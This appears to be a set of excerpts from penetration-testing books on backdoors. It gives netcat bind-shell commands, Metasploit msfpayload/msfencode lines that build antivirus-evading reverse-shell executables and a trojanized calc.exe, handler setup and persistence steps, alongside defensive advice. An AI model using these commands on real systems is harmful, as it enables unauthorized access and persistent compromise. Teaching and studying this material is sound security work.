Which type of malware has a backdoor entry that gives way to malicious users to access your system?

Backdoor Execution Summary

Each backdoor execution method described in this section has a benefit, so let's briefly look at the Table 2.2, which compares each backdoor execution method with the connection action or event and the potential to get a domain admin windows shell.

Table 2.2. Backdoor Execution Methods

Looking at Table 2.2, we can identify that the Registry Entry backdoor method will give us the best chance to escalate our system-level backdoor to a domain level shell. Also, the Task Scheduler execution method will give us the most predictable times that our backdoor will establish a connection to us.

Backdoors

Backdoors provide us with a method of bypassing the normal authentication process for a given system. Backdoors can be included in an application, either by the application developer or later by an attacker, they can be a freestanding application of their own, such as the command and control interfaces used in the nodes of botnets, or they could be implemented in the hardware or firmware of an actual device.

Backdoors, for the purposes of sabotage can allow us access to a system, outside of the restrictions of the normal authentication mechanism, in order to carry out our activities unimpeded. Such tools might be put in place, in advance of leaving, by former employees in order to give them access after their accounts have been terminated, or they may have been installed by an attacker after compromising a system.

While they can be used as a standalone tool, backdoors are often installed as a single component of an attack or a malware package. An attacker might install a backdoor in order to maintain or ease future access to a system, or a backdoor might be installed by another piece of malware in order to further exploit a machine, beyond the initial attack. Although the installation of a backdoor may or may not constitute sabotage directly, it will certainly ease the path for such activities.

Backdoors

A backdoor is a shortcut in a system that allows a user to bypass security checks (such as username/password authentication) to log in. Attackers will often install a backdoor after compromising a system. For example, an attacker gains shell access to a system by exploiting a vulnerability caused by a missing patch. The attacker wants to maintain access (even if the system is patched), so she installs a backdoor to allow future access.

Maintenance hooks are a type of backdoor; they are shortcuts installed by system designers and programmers to allow developers to bypass normal system checks during development, such as requiring users to authenticate. Maintenance hooks become a security issue if they are left in production systems.

Ensure Future Access

Once you've gained the access to key systems in the customer network, you don't want that access removed right when you need it. Some customers may notice odd things occurring on their network. For instance, Bill Morrison from the accounting office doesn't normally log in to the server at 11 p.m., or maybe there has been an unusually high level of Web traffic occurring during off hours.

When this type of activity is noticed, the customer may cut off your access, either intentionally or unintentionally. To avoid this, you'll need to secure your future access to these systems through a number of possible means. These could include backdoor applications and/or additional privileged accounts.

Backdoor applications often run in the background on a compromised system, allowing access back into the system at a later date. They often run on nonpopular ports and require a username and/or password to access the application. In instances of remote compromises, the backdoor will likely use a port that is allowed in and out through the firewall. Regardless of the port being utilized or the actual application in use, the goal is always the same: maintain and control access to compromised targets. In some cases, you may be able to simply create alternative administrative or root accounts. On systems that have hundreds of users, the new account isn't likely to ever be detected.

Backdoors

Adding backdoors to a system or application is another method that we can use in order to sustain our access. A great variety of such backdoors exist for any number of applications, and an attacker with a good knowledge of programming can easily create custom varieties. One useful set of web-based backdoors can be found in the Web Malware Compilation,m which is also included in recent versions of the Backtrack/Kali Linux distributionsno.

There are many subtle ways that we can use to create backdoors on systems, but the old standby tool netcat can perform this task for us very nicely. Versions of netcat can be found for many operating systems, and it can often be found to already exist on many Unix-like operating systems. Creating a listening port that will allow us access to a shell on the system with netcat is very simple and can be accomplished with a command on Linux such as:

nc -l -p 1234 -e /bin/bash

And we can accomplish the same on Windows with a slight tweak, like so:

Nc -l -p 1234 -e cmd.exe

In each case, we are telling netcat to listen for connections on port 1234 and to execute a program that will give the connecting client a shell. Although the listening process will be obvious to any administrator who takes the time to look for odd processes or ports being listened on, clever naming of the tool and selection of the port number can help to minimize this. Additionally, the command can be run as a scheduled job, set to run when the system boots, or a variety of other methods to ensure that the backdoor stays in place. More on backdoors using netcat can be found in Netcat Power Tools (ISBN: 978-1-59749-257-7, Syngress).

Backdoors

A backdoor is a tool of necessity; therefore, a penetration tester needs to be able to generate, upload, and execute backdoor applications. Backdoors are not hidden inside of functional programs such as a Trojan horse, but as stated earlier many Trojans contain a backdoor. The following sections will show how to create a backdoor as well as a Trojan to further cement the differences and close similarities between the two. The reader is highly encouraged to follow along with a terminal window open within the Kali Linux operating system. To successfully complete this exercise, a directory named “backdoors” should be created.

mkdir backdoors

Backdoors with Metasploit

The Metasploit GUI is powerful; however, Metasploit’s full functionality at the command line is even more impressive. The msfpayload command will generate binaries from the command line that can be used on various Microsoft and Linux platforms, as well as web applications. Furthermore, the msfpayload can be piped through msfencode tools to further encode the binaries created and attempt to avoid antivirus detection.

Creating an Executable Binary from a Payload (Unencoded)

The msfpayload tools works hand-in-hand with any payload listed within Metasploit. For a current listing of payloads available, use msfpayload -l at the command line. The following steps will use the “windows/meterpreter/reverse_https” payload. Figure 10.1 shows the output of msfpayload {payload_name} S command. This will show the penetration tester the fields that are required to be set while converting a payload into an executable binary file.

Figure 10.1. Output of msfpayload.

The msfpayload tools come equipped to pipe the payload into the following formats:

•

[C] C

•

[H] C-sharp

•

[P] Perl

•

[Y] Ruby

•

[R] Raw

•

[J] Javascript

•

[X] Executable

•

[D] Dynamic Link Library (DLL)

•

[V] VBA

•

[W] War

•

[N] Python

With all of the information required, the tester can create an executable binary with the following command. Note that this is a single command and should be entered on a single line.

msfpayload windows/meterpreter/reverse_tcp LHOST={YOUR_IP} LPORT={PORT} X > /root/backdoors/unencoded-payload.exe

Figure 10.2 shows the output from the creation of the unencoded-payload.exe backdoor.

Figure 10.2. Creating an executable binary from a payload.

Creating an Executable Binary from a Payload (Encoded)

The msfencode tool

msfpayload windows/meterpreter/reverse_tcp LHOST={YOUR_IP} LPORT={PORT} R | msfencode -e x86/countdown -c 2 -t raw | msfencode –x -t exe -e x86/shikata_ga_nai -c 3 -k -o /root/backdoors/encoded-payload.exe

Figure 10.3 shows the output from the creation of the encoded-payload.exe backdoor.

Figure 10.3. Creating an executable binary from a encoded payload.

Creating an Encoded Trojan Horse

The backdoors in the previous sections run solely in the background and do not interact with the user logged into the system at the time. A Trojan horse gives the appearance of functional program that the user might use. This guide was created from the calc.exe (calculator) application from a Microsoft Windows XP, Service Pack 3 platform. For this exercise to work correctly, the calc.exe application must be copied to an external thumb drive.

Not all binaries on the Windows platform are susceptible to Trojanization. For instance, if the calc.exe application from a Windows 7 Ultimate platform was used, this attack would not even execute. Other considerations are the amount of encoding used, active firewalls, intrusion detection systems, and cryptosystems. Not all executables will work; Trojanization of an executable is a trial and error, research process, best suited for a lab.

msfpayload windows/meterpreter/reverse_tcp {YOUR_IP} {PORT} R | msfencode -e x86/countdown -c 2 -t raw | msfencode -x /media/{EXTERNAL_USB_DRIVE}/calc.exe -t exe -e x86/shikata_ga_nai -c 3 -k -o /root/backdoors/trojan-calc.exe

Figure 10.4 shows the output from the creation of the trojan-cmd-payload.exe Trojan horse from a Windows calc.exe binary.

Figure 10.4. Creating an executable Trojan horse for Microsoft Windows.

The Trojan horse created from the Windows binary calc.exe can be uploaded to a victim in numerous ways as described in this book.

Set Up a Metasploit Listener

The backdoors and Trojan horse that were created are client-side attacks and call home for further instructions. The penetration tester will need to set up a listener in Metasploit to answer the call. The multi-handler within Metasploit is a glorified answering service for a Trojan or backdoor to call home and receive further instructions.

1.

msfconsole

2.

use exploit/multi/handler

3.

set PAYLOAD windows/meterpreter/reverse_tcp

4.

set LHOST {YOUR_IP}

5.

set LPORT {PORT}

6.

run

Figure 10.5 shows the setup of a listener on Metasploit and a call back from a backdoor. The connection was made from the victim’s operating system with the unencoded-payload.exe application was executed.

Figure 10.5. Metasploit multi-handler listening.

Persistent Backdoors

Much like the idea of a college student call back home to check on their folks and ask for money, the backdoor or Trojan will also need to follow the same basic routine. Unlike a college student, this is easier with the scheduleme task within a meterpreter shell. The scheduleme tool can launch commands based upon time increments (example, every week or every 20 minutes), or based upon certain machine or user actions, such as startup or user’s logging into the computer.

scheduleme -c {“file/command”} -i -l

Figure 10.6 shows a schedule that is set to kick off the unencoded-payload.exe application every time a user logs into the system. It will attempt to execute the command only once but will run immediately following the login process. This will help ensure that the application calls home on a regular basis.

Figure 10.6. Scheduleme.

Detectability

If the tester knows what antivirus application is running on a potential target system or desires to test the strength of an encoding process, the files (aka, backdoors and Trojans) can be uploaded to http://www.virustotal.com/. Figure 10.7 shows the detectability of common antivirus vendors against the trojan-calc.exe file.

Figure 10.7. VirusTotal.com.

Protecting yourself from backdoors and exploits

Backdoors are undocumented ways of accessing systems. A programmer may have included one to access a system without needing to be authenticated or may be created when a system is compromised by a virus, worm, or other malicious software. Once the backdoor is in place, a hacker can use it for continued access to a system, until the software providing the backdoor has been patched by updated software.

It’s important to keep up to date with installing patches, updates, and service packs on computers. When operating systems and software are released, there may be bugs or glitches in the software that a hacker or malware can exploit. An exploit is a command, method, or software that will use a vulnerability in a system to gain additional access, download additional malware, or run commands that can damage your data or system. As bugs and vulnerabilities are identified, software vendors will release patches, bug-fixes, and other updates that will fix the problems to make the system more stable and secure.

The other way to protect systems is to limit what’s installed. Organizations commonly set up security on computers, network group policies, and corporate policies that restrict the download and installation of software. By preventing users from downloading unauthorized apps, widgets, and programs, there’s less chance that malicious software will also be downloaded by mistake.

SBD

Shadowinteger's Backdoor (SBD) is another Netcat variant, with all of the features of the original Netcat plus some new ones. SBD is available for both Windows and *nix, with pre-compiled binaries included in the single g-zipped file from http://security.cycom.se/dl/sbd. This feature alone makes SBD a good candidate to settle on as your Netcat-like utility of choice. If that is not enough reason, it offers encryption like cryptcat, and a respawn option, providing the –L functionality for both Windows and *nix hosts. You can put a wrapper script around any version of Netcat to cause it to restart on *nix, but with SBD providing that functionality built-in, there is little need for such effort.

While the basic operation of SBD remains much the same as the other Netcat-like tools, there are a couple of additional options that could be useful for transferring files. SBD allows you to specify the source port via the –p option if you are running in client mode (in server mode, –p specifies the listening port as usual). This feature could allow you to get through a firewall by making the SBD session look like a reply to a friendly protocol such as DNS. Of course, this trick is not going to fool a statefull firewall, but having this increased control never hurts.

The –r option allows you to tell SBD to re-spawn after a client disconnect instead of the default Netcat behavior, which is to shut down the server. You can also configure a delay in seconds before re-spawning, this delay could be useful to help slow down any attempts to brute force your listening process. The Windows version of Netcat provides the same functionality via the –L option, while the original *nix version offers no such option. The delay can be set to zero seconds which provides identical behavior to the Windows Netcat –L option.

With cryptcat, encryption is enabled by default, even if you do not specify a shared secret key. SBD takes the same approach except encryption can be disabled completely via the –c option (–c off disables encryption, –c on is the default). Similar to cryptcat, the –k option is used to specify the shared secret key. Another interesting option is –P, which is used to specify a prefix for incoming data. The original intent seems to be to facilitate SBD as a primitive chat client; however, it could also be useful to provide a sort of data “tag” for the server to log. Take for example, a scenario where you have two or more systems running a custom script you created. You want each system to log a status message so you know the process completed successfully. You could program in a custom message on each host, or grab a variable from the environment, or you could also have SBD add the “tag.” The only other consideration to be aware of concerns SBD's behavior after a file transfer is completed. Unlike the original Netcat, SBD closes the connection after the file transfer is completed. This behavior makes the use of the –w option obsolete.

Defense

Defending against backdoors being inserted requires a twofold approach. We first want to make sure that successfully inserting such backdoors is difficult to begin with. We can help to mitigate such attacks by ensuring that our systems and applications are as hardened as we can reasonably make them, and that both our outgoing and incoming traffic is as restricted as we can make it and still function properly. We can also lock down administrative access our systems through the use of utilities such as powerbroker and Cisco Security Agent (CSA). These will help to prevent the insertion of backdoors and make a considerably more difficult task for those that are attempting to attach to them.

The second portion of defending against backdoor attacks is auditing. If we carefully audit accounts, system access, open ports, and other items that could be used to create a backdoor, we at least stand a chance of quickly catching anything that has been put in place. Unfortunately, this type of auditing is a time consuming and thankless task, and so is not commonly implemented. In many environments, a subtly implemented backdoor many never be found, largely due to lack of anyone looking.

Remote Access Trojans